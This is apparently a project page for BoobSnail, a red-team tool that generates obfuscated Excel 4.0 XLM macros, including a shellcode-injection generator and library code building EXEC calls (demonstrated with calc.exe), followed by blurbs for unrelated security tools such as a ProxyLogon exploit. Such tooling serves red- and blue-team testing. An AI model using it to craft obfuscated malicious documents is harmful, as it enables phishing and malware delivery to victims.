BoobSnail allows generating Excel 4.0 XLM macro. Its purpose is to support the RedTeam and BlueTeam in XLM macro generation.

Related tags

Security related resourcesobfuscationpentestingpentestblueteammsofficesocial-engineeringredteamexcel-macrosxlm-macroexcel4macros-generator
Overview

License

Follow us on Twitter!

BoobSnail

BoobSnail allows generating XLM (Excel 4.0) macro. Its purpose is to support the RedTeam and BlueTeam in XLM macro generation. Features:

  • various infection techniques;
  • various obfuscation techniques;
  • translation of formulas into languages other than English;
  • can be used as a library - you can easily write your own generator.

Building and Running

Tested on: Python 3.8.7rc1

pip install -r requirements.txt
python boobsnail.py
___.                ___.     _________             .__.__
\_ |__   ____   ____\_ |__  /   _____/ ____ _____  |__|  |
 | __ \ /  _ \ /  _ \| __ \ \_____  \ /    \__  \ |  |  |
 | \_\ (  <_> |  <_> ) \_\ \/        \   |  \/ __ \|  |  |__
 |___  /\____/ \____/|___  /_______  /___|  (____  /__|____/
     \/                  \/        \/     \/     \/
     Author: @_mzer0 @stm_cyber
     (...)

Generators usage

python boobsnail.py <generator> -h

To display available generators type:

python boobsnail.py

Examples

Generate obfuscated macro that injects x64 or x86 shellcode:

python boobsnail.py Excel4NtDonutGenerator --inputx86 <PATH_TO_SHELLCODE> --inputx64 <PATH_TO_SHELLCODE> --out boobsnail.csv

Generate obfuscated macro that runs calc.exe:

python boobsnail.py Excel4ExecGenerator --cmd "powershell.exe -c calc.exe" --out boobsnail.csv

Saving output in Excel

  1. Dump output to CSV file.
  2. Copy content of CSV file.
  3. Run Excel and create a new worksheet.
  4. Add new Excel 4.0 Macro (right-click on Sheet1 -> Insert -> MS Excel 4.0 Macro).
  5. Paste the content in cell A1 or R1C1.
  6. Click Data -> Text to Columns.
  7. Click Next -> Set Semicolon as separator and click Finish.

Library usage

BoobSnail shares the excel4lib library that allows creating your own Excel4 macro generator. excel4lib contains few classes that could be used during writing generator:

  • excel4lib.macro.Excel4Macro - allows to defining Excel4 formulas, values variables;
  • excel4lib.macro.obfuscator.Excel4Obfuscator - allows to obfuscate created instructions in Excel4Macro;
  • excel4lib.lang.Excel4Translator - allows translating formulas to another language.

The main idea of this library is to represent Excel4 formulas, variables, formulas arguments, and values as python objects. Thanks to that you are able to change instructions attributes such as formulas or variables names, values, addresses, etc. in an easy way. For example, let's create a simple macro that runs calc.exe

from excel4lib.macro import *
# Create macro object
macro = Excel4Macro("test.csv")
# Add variable called cmd with value "calc.exe" to the worksheet
cmd = macro.variable("cmd", "calc.exe")
# Add EXEC formula with argument cmd
macro.formula("EXEC", cmd)
# Dump to CSV
print(macro.to_csv())

Result:

cmd="calc.exe";
=EXEC(cmd);

Now let's say that you want to obfuscate your macro. To do this you just need to import obfuscator and pass it to the Excel4Macro object:

from excel4lib.macro import *
from excel4lib.macro.obfuscator import *
# Create macro object
macro = Excel4Macro("test.csv", obfuscator=Excel4Obfuscator())
# Add variable called cmd with value "calc.exe" to the worksheet
cmd = macro.variable("cmd", "calc.exe")
# Add EXEC formula with argument cmd
macro.formula("EXEC", cmd)
# Dump to CSV
print(macro.to_csv())

For now excel4lib shares two obfuscation classes:

  • excel4lib.macro.obfuscator.Excel4Obfuscator uses Excel 4.0 functions such as BITXOR, SUM, etc to obfuscate your macro;
  • excel4lib.macro.obfuscator.Excel4Rc4Obfuscator uses RC4 encryption to obfusacte formulas.

As you can see you can write your own obfuscator class and use it in Excel4Macro.

Sometimes you will need to translate your macro to another language for example your native language, in my case it's Polish. With excel4lib it's pretty easy. You just need to import Excel4Translator class and call set_language

from excel4lib.macro import *
from excel4lib.lang.excel4_translator import *
# Change language
Excel4Translator.set_language("pl_PL")
# Create macro object
macro = Excel4Macro("test.csv", obfuscator=Excel4Obfuscator())
# Add variable called cmd with value "calc.exe" to the worksheet
cmd = macro.variable("cmd", "calc.exe")
# Add EXEC formula with argument cmd
macro.formula("EXEC", cmd)
# Dump to CSV
print(macro.to_csv())

Result:

cmd="calc.exe";
=URUCHOM.PROGRAM(cmd);

For now, only the English and Polish language is supported. If you want to use another language you need to add translations in the excel4lib/lang/langs directory.

For sure, you will need to create a formula that takes another formula as an argument. You can do this by using Excel4Macro.argument function.

from excel4lib.macro import *
macro = Excel4Macro("test.csv")
# Add variable called cmd with value "calc" to the worksheet
cmd_1 = macro.variable("cmd", "calc")
# Add cell containing .exe as value
cmd_2 = macro.value(".exe")
# Create CONCATENATE formula that CONCATENATEs cmd_1 and cmd_2
exec_arg = macro.argument("CONCATENATE", cmd_1, cmd_2)
# Pass CONCATENATE call as argument to EXEC formula
macro.formula("EXEC", exec_arg)
# Dump to CSV
print(macro.to_csv())

Result:

cmd="calc";
.exe;
=EXEC(CONCATENATE(cmd,R2C1));

As you can see ".exe" string was passed to CONCATENATE formula as R2C1. R2C1 is address of ".exe" value (ROW number 2 and COLUMN number 1). excel4lib returns references to formulas, values as addresses. References to variables are returned as their names. You probably noted that Excel4Macro class adds formulas, variables, values to the worksheet automaticly in order in which these objects are created and that the start address is R1C1. What if you want to place formulas in another column or row? You can do this by calling Excel4Macro.set_cords function.

from excel4lib.macro import *
macro = Excel4Macro("test.csv")
# Column 1
# Add variable called cmd with value "calc" to the worksheet
cmd_1 = macro.variable("cmd", "calc")
# Add cell containing .exe as value
cmd_2 = macro.value(".exe")
# Column 2
# Change cords to columns 2
macro.set_cords(2,1)
exec_arg = macro.argument("CONCATENATE", cmd_1, cmd_2)
# Pass CONCATENATE call as argument to EXEC formula
exec_call = macro.formula("EXEC", exec_arg)
# Column 1
# Back to column 1. Change cords to column 1 and row 3
macro.set_cords(1,3)
# GOTO EXEC call
macro.goto(exec_call)
# Dump to CSV
print(macro.to_csv())

Result:

cmd="calc";=EXEC(CONCATENATE(cmd,R2C1));
.exe;;
=GOTO(R1C2);;

Author

mzer0 from stm_cyber team!

Articles

The first step in Excel 4.0 for Red Team

BoobSnail - Excel 4.0 macro generator

Owner
STM Cyber
STM Cyber
GitHub Repository https://blog.stmcyber.com/boobsnail-excel-4-0-macro-generator/
A bare-bones POC container runner in python

pybox A proof-of-concept bare-bones container written in 50 lines of python code. Provides namespace isolation and resource limit control Usage Insta

Anirudh Haritas Murali 5 Jun 03, 2021
Experimental musig2 python code, not for production use!

musig2-py Experimental musig2 python code, not for production use! This is just for testing things out. All public keys are encoded as 32 bytes, assum

Samuel Dobson 14 Jul 08, 2022
Update of uncaptcha2 from 2019

YouTube Video Proof of Concept I created a new YouTube Video with technical Explanation for breaking Google's Audio reCAPTCHAs: Click on the image bel

Nikolai Tschacher 153 Dec 20, 2022
Writeups for wtf-CTF hosted by Manipal Information Security Team as part of Techweek2021- INCOGNITO

wtf-CTF_Writeups Table of Contents Table of Contents Crypto Misc Reverse Pwn Web Crypto wtf_Bot Author: Madjelly Join the discord server!You know how

6 Jun 07, 2021
CC CAMERA HACKING TOOL

CAM-HACK CC CAMERA HACKING TOOL Installation On Termux $ apt update

Aryan 10 Sep 25, 2022
Open source vulnerability DB and triage service.

OSV - Open Source Vulnerabilities OSV is a vulnerability database and triage infrastructure for open source projects aimed at helping both open source

Google 893 Jan 04, 2023
A hashtag check python module

A hashtag check python module

Fayas Noushad 3 Aug 10, 2022
ProxyLogon Pre-Auth SSRF To Arbitrary File Write

ProxyLogon Pre-Auth SSRF To Arbitrary File Write For Education and Research Usage: C:\python proxylogon.py mail.evil.corp lulz 117 Nov 28, 2022

A dynamic multi-STL, multi-process OpenSCAD build system with autoplating support

scad-build This is a multi-STL OpenSCAD build system based around GNU make. It supports dynamic build targets, intelligent previews with user-defined

Jordan Mulcahey 1 Dec 21, 2021
BF-Hash - A Python Tool to decrypt hashes by brute force

BF-Hash Herramienta para descifrar hashes por fuerza bruta Instalación git clone

5 Apr 09, 2022
DepFine Is a tool to find the unregistered dependency based on dependency confusion valunerablility and lead to RCE

DepFine DepFine Is a tool to find the unregistered dependency based on dependency confusion valunerablility and lead to RCE Installation: You Can inst

Hossam mesbah 14 Nov 11, 2022
neo Tool is great one in binary exploitation topic

neo Tool is great one in binary exploitation topic. instead of doing several missions by many tools and windows, you can now automate this in one tool in one session.. Enjoy it

Hamza Elansari 4 Oct 10, 2022
Herramienta para descargar eventos de Sucuri WAF hacia disco.

Descarga los eventos de Sucuri Script para descargar los eventos del Sucuri Web Application Firewall (WAF) en el disco como archivos CSV. Requerimient

CSIRT-RD 2 Nov 29, 2021
Website OSINT untuk mencari informasi dari email dan nomor telepon. Dibuat dengan React dan Flask.

Inspektur Cari informasi mengenai email dan nomor telepon dengan mudah. Inspektur adalah aplikasi OSINT yang berguna untuk mencari informasi berdasark

Bagas Wastu 36 Dec 04, 2022
Simplify getting and using cookies from the browser to use in Python.

CookieCache Simplify getting and using cookies from the browser to use in Python. NOTE: All the logic to interface with the browsers is done by the Br

pat_h/to/file 2 May 06, 2022
The Multi-Tool Web Vulnerability Scanner.

🟥 RapidScan v1.2 - The Multi-Tool Web Vulnerability Scanner RapidScan has been ported to Python3 i.e. v1.2. The Python2.7 codebase is available on v1

skavngr 1.3k Dec 31, 2022
A python script to decrypt media files encrypted using the Android application 'Decrypting 'LOCKED Secret Calculator Vault''. Will identify PIN / pattern.

A python script to decrypt media files encrypted using the Android application 'Decrypting 'LOCKED Secret Calculator Vault''. Will identify PIN / pattern.

3 Sep 26, 2022
Mass scan for .git repository and .env file exposure

Mass .Git repository and .Env file Scan by Scarmandef Scanner to find .env file and .git repository exposure on multiple hosts Because of the response

8 Jun 23, 2022
Automatic SQL injection and database takeover tool

sqlmap sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of

sqlmapproject 25.7k Jan 08, 2023
Colin O'Flynn's Hacakday talk at Remoticon 2021 support repo.

Hardware Hacking Resources This repo holds some of the examples used in Colin's Hardware Hacking talk at Remoticon 2021. You can see the very sketchy

Colin O'Flynn 19 Sep 12, 2022